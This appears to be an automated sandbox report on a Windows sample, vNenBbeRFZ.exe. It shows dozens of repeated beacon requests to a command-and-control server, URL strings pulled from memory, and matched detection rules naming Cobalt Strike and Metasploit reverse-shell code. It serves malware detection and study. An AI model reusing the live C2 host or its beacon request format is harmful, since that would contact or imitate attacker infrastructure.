Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ga.js HTTP/1.1Accept: /Cookie: ZhJGO+YicJXTD8NFAzTnIMlAcozNo9p3FemKNedLC+sBNOGUFqUt/g2bI15CkWlFo4eeFnSxw0geisSn9MmfYKEtoX+hZc4iyJVE09MhGvqqj2Dw9I1puVFIg35JNH+cQZcKagxe86HWvMZlh0giJbFNWxy/UXZAYviPcTLIDio=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)Host: 47.239.242.141:9999Connection: Keep-AliveCache-Control: no-cache

Source: vNenBbeRFZ.exe, 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPy
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPy%
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPyHPe)
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/BQPygP
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.js
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsSX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsW
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jskX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsl
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsl#
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslGX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslqX
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jslu
Source: vNenBbeRFZ.exe, 00000000.00000002.4136774316.000000000071E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://47.239.242.141:9999/ga.jsot

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike payload Author: ditekSHen
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 Author: unknown
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon). Author: unknown
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
